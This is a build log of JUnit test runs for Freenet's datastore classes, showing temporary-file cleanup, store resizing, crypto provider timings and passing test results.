    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false
    [junit] Resizing datastore teststore
    [junit] Waiting for resize to complete...
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Successfully closed store teststore
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Successfully closed store teststore
    [junit] Waiting for resize to complete...
    [junit] Resizing datastore teststore
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 28,825 sec
    [junit] Tests run: 8, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 28,825 sec
    [junit] ------------- Standard Output ---------------
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12211695ns
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12343605ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] Resizing datastore (teststore)
    [junit] Resizing datastore teststore
    [junit] Successfully closed store teststore
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-50-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-0-true/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Slot filter (tmp-slashdotstoretest/saltstore/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=true).
    [junit] Waiting for resize to complete...
    [junit] teststore cleaner in progress: 0/10
    [junit] Completed shrink, old size was 10 new size was 20 size is now 20 (prev=0)
    [junit] Slot filter (tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter) for teststore is loaded (new=false).
    [junit] teststore cleaner in progress: 0/20
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.config
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-false/teststore.hd
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.metadata
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.config
    [junit] Shutting down...
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.slotfilter
    [junit] DELETING FILE tmp-slashdotstoretest/saltstore-5-10-true/teststore.hd
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testRAMStoreOldBlocks took 8,65 sec
    [junit] Testcase: testMigrateKeyed took 0,536 sec
    [junit] Testcase: testSaltedStoreOldBlock took 1,913 sec
    [junit] Testcase: testMigrate took 0,135 sec
    [junit] Testcase: testSaltedStoreWithClose took 11,16 sec
    [junit] Testcase: testRAMStore took 0,044 sec
    [junit] Testcase: testSaltedStore took 0,462 sec
    [junit] Testcase: testSaltedStoreResize took 5,369 sec
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Successfully closed store teststore
    [junit] Running freenet.store.SimplePubkeyCacheTest
    [junit] Testsuite: freenet.store.SimplePubkeyCacheTest
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi763237010618395458lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,743 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,743 sec
    [junit] ------------- Standard Output ---------------
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testSimple took 2,308 sec
    [junit] Running freenet.store.SlashdotStoreTest
    [junit] Testsuite: freenet.store.SlashdotStoreTest
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi4529179146234517394lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12403660ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12357145ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] DELETING FILE tmp-slashdotstoretest/temp-5cbc7b772b053911
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 12,93 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 12,93 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12403660ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12357145ns
    [junit] Using JCA cipher provider: BC version 1.54
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] Deleted 0 of 0 temporary files (0 non-temp files in temp directory) in 0s
    [junit] DELETING FILE tmp-slashdotstoretest/temp-5cbc7b772b053911
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testDeletion took 12,166 sec
    [junit] Testcase: testSimple took 0,247 sec
    [junit] Running freenet.store.caching.CachingFreenetStoreTest
    [junit] Testsuite: freenet.store.caching.CachingFreenetStoreTest
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi3181800319206520722lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12131876ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12277187ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
